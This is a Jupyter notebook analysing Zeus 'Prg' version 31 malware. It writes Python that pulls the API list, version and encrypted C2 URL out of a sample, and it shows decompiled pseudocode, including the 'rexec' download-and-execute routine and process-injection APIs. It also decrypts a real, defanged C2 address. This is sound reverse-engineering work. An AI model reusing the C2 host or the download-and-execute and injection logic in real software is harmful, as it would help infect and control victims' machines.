## Initial Setup

1. Download the Prg version 31 reference sample from [MalwareBazaar](https://bazaar.abuse.ch/sample/d903fe1ba67138993ca3f1f4d86321610b47a068ad9bbc6245ab1f8e79778034/).

In [1]:
# Install required Python modules
import sys
!{sys.executable} -m pip install pefile

# Import required Python modules
import pprint
import re
import struct

import pefile

Defaulting to user installation because normal site-packages is not writeable


In [2]:
# Load the unpacked sample
fp = open("d903fe1ba67138993ca3f1f4d86321610b47a068ad9bbc6245ab1f8e79778034.bin", "rb")
sample = fp.read()
fp.close()

pe = pefile.PE(data=sample)

## Resolve Windows API Calls

Pseudocode:

    ... 
    g_loaded_dlls = resolve_win_apis(aKernel32Dll_0, &off_14D01D58, 0x57u);
    ... 
    
Disassembly:

    ... 
    UPX0:14D06FD3 6A 57                         push    57h 
    UPX0:14D06FD5 68 58 1D D0 14                push    offset off_14D01D58
    UPX0:14D06FDA 68 58 23 D0 14                push    offset aKernel32Dll_0
    UPX0:14D06FDF E8 84 FF FF FF                call    resolve_win_apis
    ... 
    UPX0:14D06FF0 A3 A8 9C D0 14                mov     g_loaded_dlls, eax 
    ... 
    
Pseudocode:

    HMODULE __cdecl resolve_win_apis(LPCSTR lpLibFileName, int a2, unsigned __int16 a3) 
    {   
      HMODULE LibraryA; // ebx 
      unsigned __int16 v4; // di
      int v5; // esi 

      LibraryA = LoadLibraryA(lpLibFileName);
      v4 = 0;
      if ( !LibraryA || !a3 )
        return LibraryA;
      while ( 1 ) 
      {   
        v5 = a2 + 8 * v4; 
        **(v5 + 4) = GetProcAddress(LibraryA, *v5);
        if ( !**(v5 + 4) )
          break;
        if ( ++v4 >= a3 )
          return LibraryA;
      }   
      return 0;
    } 

In [3]:
match = re.search(rb'\x6a(?P<num_entries>\x57)\x68(?P<api_list_addr>[\s\S]{4})', pe.get_memory_mapped_image())
num_entries = struct.unpack("B", match.group("num_entries"))[0]
api_list_addr = struct.unpack("I", match.group("api_list_addr"))[0]

for i in range(num_entries):
    offset = api_list_addr + 8 * i
    offset_rva = offset - pe.OPTIONAL_HEADER.ImageBase
    api_name_addr = pe.get_dword_at_rva(offset_rva)
    api_name_addr_rva = api_name_addr - pe.OPTIONAL_HEADER.ImageBase
    api_name = pe.get_data(api_name_addr_rva, 128).split(b"\x00")[0].decode()
    print(f"{i}: {api_name}")

0: CreateMutexW
1: GetModuleHandleW
2: Sleep
3: CopyFileW
4: GetModuleFileNameW
5: GetModuleFileNameA
6: GetLastError
7: lstrcmpiW
8: lstrcmpiA
9: lstrlenW
10: lstrlenA
11: lstrcpyW
12: lstrcpyA
13: lstrcatW
14: CloseHandle
15: DeleteFileW
16: SetFileAttributesW
17: WaitForSingleObject
18: SetEvent
19: CreateFileW
20: CreateEventW
21: SetFilePointer
22: HeapAlloc
23: HeapReAlloc
24: HeapFree
25: GetCurrentProcess
26: ConnectNamedPipe
27: WaitNamedPipeW
28: SetNamedPipeHandleState
29: CreateNamedPipeW
30: GetTickCount
31: CreateRemoteThread
32: GetProcessHeap
33: GetSystemDirectoryW
34: WriteFile
35: ReadFile
36: SetEndOfFile
37: GetFileSize
38: FlushFileBuffers
39: GetLocalTime
40: DisconnectNamedPipe
41: WriteProcessMemory
42: CreateThread
43: CreateToolhelp32Snapshot
44: Process32FirstW
45: Process32NextW
46: Thread32First
47: Thread32Next
48: GetExitCodeProcess
49: OpenProcess
50: OpenMutexW
51: VirtualQueryEx
52: VirtualProtectEx
53: VirtualAllocEx
54: VirtualFreeEx
55: VirtualProt

## Extract Version

Pseudocode:

    ... 
    switch ( a1 )
    {   
    case 1:
      return 31;                                // return version
    ... 
    
Disassembly:

    ... 
    UPX0:14D045C3 8B 45 08                                      mov     eax, [ebp+arg_0]
    UPX0:14D045C6 83 F8 01                                      cmp     eax, 1
    UPX0:14D045C9 75 05                                         jnz     short loc_14D045D0
    UPX0:14D045CB 6A 1F                                         push    1Fh 
    UPX0:14D045CD 58                                            pop     eax 
    UPX0:14D045CE 5D                                            pop     ebp 
    UPX0:14D045CF C3                                            retn
    ... 

In [4]:
match = re.search(rb'\x6a(?P<version>\x1f)\x58\x5d\xc3', pe.get_memory_mapped_image())
version = struct.unpack("B", match.group("version"))[0]
print(version)

31


## Get Command and Control URL

Prg version 31 predates the typical Zeus BaseConfig data structure.

Pseudocode:

    ... 
    decrypt_data(g_malware_mz + 0x40, *(g_malware_mz + *(g_malware_mz + 15) - 1), &c2);
    ... 
    
Pseudocode:

    _BYTE *__cdecl decrypt_data(int encbuf, unsigned int len, int *p_plainbuf)
    {   
      _BYTE *plainbuf; // eax 
      unsigned int i; // eax 
      int v5; // ecx 

      plainbuf = Mem::alloc(len + 16);
      *p_plainbuf = plainbuf;
      if ( plainbuf )
      {   
        Mem::_copy(plainbuf, encbuf, len);
        for ( i = 0; i < len; ++i )
        {
          v5 = *p_plainbuf;
          if ( (i & 1) != 0 ) 
            *(v5 + i) += -7 - 2 * i;
          else
            *(i + v5) += 2 * (i + 5); 
        }
        return len;
      }   
      return plainbuf;
    }

In [5]:
def decrypt_data(encbuf):
    plainbuf = b""
    
    for i, c in enumerate(encbuf):
        if i & 1 == 1:
            plain_byte = (c + -7 - 2 * i) & 0xff
        else:
            plain_byte = (c + 2 * (i + 5)) & 0xff

        plainbuf += struct.pack("B", plain_byte)
    
    return plainbuf


# url len is 1 byte before PE
pe_offset = struct.unpack("I", pe.get_memory_mapped_image()[0x3c:0x3c+4])[0]
url_len = pe.get_memory_mapped_image()[pe_offset-1]

# offset is hardcoded
url_offset = 0x40
encrypted_url = pe.get_memory_mapped_image()[url_offset:url_offset+url_len]

url = decrypt_data(encrypted_url).decode().replace("http", "hxxp")
print(url)

hxxp://sys1378.3fn.net/zs/.bin/config.dat


## Download DynamicConfig

I haven't been able to find a DynamicConfig file for any sample of Prg. If you have any of [these](https://pastebin.com/TrTVdxHe) files in your archive, please reach out to curator@zeusmuseum.com / [@tildedennis](https://twitter.com/tildedennis).

## Parse DynamicConfig

The DynamicConfig file contains an array of structures. Each structure looks like:

- `id` (WORD)
- `length` (WORD)
- `encrypted_flag` (BYTE)
- `data` (length bytes)

If the `encrypted_flag` is set, the data is decrypted using the `decrypt_data` function from above.

Pseudocode:

    _BYTE *__cdecl get_entry_from_video_dll(__int16 entry_id, int *entry_data)
    {
      unsigned __int16 v2; // ax
      int entry_len; // esi
      void *entry; // edi
      _BYTE *v5; // esi
      s5 s5; // [esp+Ch] [ebp-Ch] BYREF
      DWORD NumberOfBytesRead; // [esp+14h] [ebp-4h] BYREF

      NumberOfBytesRead = 0;
      SetFilePointer(g_wsnpoem_video_dll_path_fp, 0, 0, 0);
      while ( 1 )
      {
        if ( !ReadFile(g_wsnpoem_video_dll_path_fp, &s5, 5u, &NumberOfBytesRead, 0) || NumberOfBytesRead != 5 )
          return 0;
        LOBYTE(v2) = 0;
        HIBYTE(v2) = HIBYTE(s5.len);
        entry_len = LOBYTE(s5.len) | v2;
        if ( s5.id == entry_id )
          break;
        SetFilePointer(g_wsnpoem_video_dll_path_fp, entry_len, 0, 1u);
      }
      entry = Mem::alloc(entry_len);
      if ( !entry )
        return 0;
      if ( !ReadFile(g_wsnpoem_video_dll_path_fp, entry, entry_len, &NumberOfBytesRead, 0) || NumberOfBytesRead != entry_len )
      {
        Mem::free(entry);
        return 0;
      }
      if ( entry_data )
      {
        if ( (s5.encrypted_flag & 1) != 0 )
        {
          v5 = decrypt_data(entry, entry_len, entry_data);
          Mem::free(entry);
          return v5;
        }
        *entry_data = entry;
      }
      else
      {
        Mem::free(entry);
      }
      return NumberOfBytesRead;
    }
    
The following `id`s have been identified:

- 1\. Prg version
- 2\. URL to download and execute
- 3\. New DynamicConfig URL
- 4\. URL to send stolen data to
- 5\. Command poll URL
- 7\. Redirect URL to a fake URL

Sections 12, 13, and 14 of [[Prg] Malware Case Study](https://www.mnin.org/write/ZeusMalware.pdf) are a good reference for some of these `id`s.

## Commands

Prg version 31 only has one command, `rexec`, which downloads and executes an URL.

Pseudocode:
    
    ...
            if ( p_current != decrypted_data
              && extract_argument(decrypted_data, p_current - decrypted_data, &arg, &arg_len)
              && !Str::_CompareA(arg, g_rexec, arg_len - arg + 1, 5)
              && arg_len + 1 < p_current
              && extract_argument((arg_len + 1), &p_current[-arg_len - 1], &arg, &arg_len) )
            {
              url = Str::_CopyExA(arg, arg_len - arg + 1);
              if ( url )
              {
                Fs::_createTempFile(file_to_download_to);
                v12 = 0;
                while ( !Wininet::_CallURL(g_c2_io_hdl, file_to_download_to, url, hHandle) )
                {
                  Sleep(0x3E8u);
                  if ( ++v12 >= 0xAu )
                    goto LABEL_17;
                }
                StartupInfo.dwFlags = 0;
                StartupInfo.cbReserved2 = 0;
                StartupInfo.lpReserved2 = 0;
                memset(&StartupInfo.lpReserved, 0, 12);
                StartupInfo.cb = 68;
                if ( CreateProcessW(file_to_download_to, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation) )
    ...